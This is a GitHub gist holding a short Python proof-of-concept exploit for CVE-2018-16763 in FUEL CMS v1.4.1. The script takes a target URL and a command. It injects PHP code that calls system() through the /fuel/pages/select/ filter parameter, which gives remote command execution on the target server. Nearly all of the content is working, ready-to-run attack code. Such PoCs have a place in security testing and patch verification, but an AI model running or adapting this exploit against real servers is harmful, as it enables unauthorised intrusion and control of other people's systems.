Skip to content

Instantly share code, notes, and snippets.

@wulfgarpro
Created September 29, 2020 08:30
Show Gist options
  • Save wulfgarpro/d302038d40e4aab46a5b61d876b01b93 to your computer and use it in GitHub Desktop.
Save wulfgarpro/d302038d40e4aab46a5b61d876b01b93 to your computer and use it in GitHub Desktop.
FUEL CMS v1.4.1 CVE-2018-16763 PoC
"""
FUEL CMS v1.4.1 CVE-2018-16763 PoC.
This PoC was derived from: https://www.exploit-db.com/exploits/47138.
"""
import argparse
import urllib
import requests
parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')
parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1')
parser.add_argument('cmd', type=str, help='Command to execute')
args = parser.parse_args()
url=args.url
cmd=args.cmd
payload="'+pi(print($a='system'))+$a('"+cmd+"')+'"
payload_enc=urllib.quote(payload) # URL encoded payload
filter_path='/fuel/pages/select/?filter='+payload_enc
try:
_ = requests.get(url+filter_path)
except:
pass
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment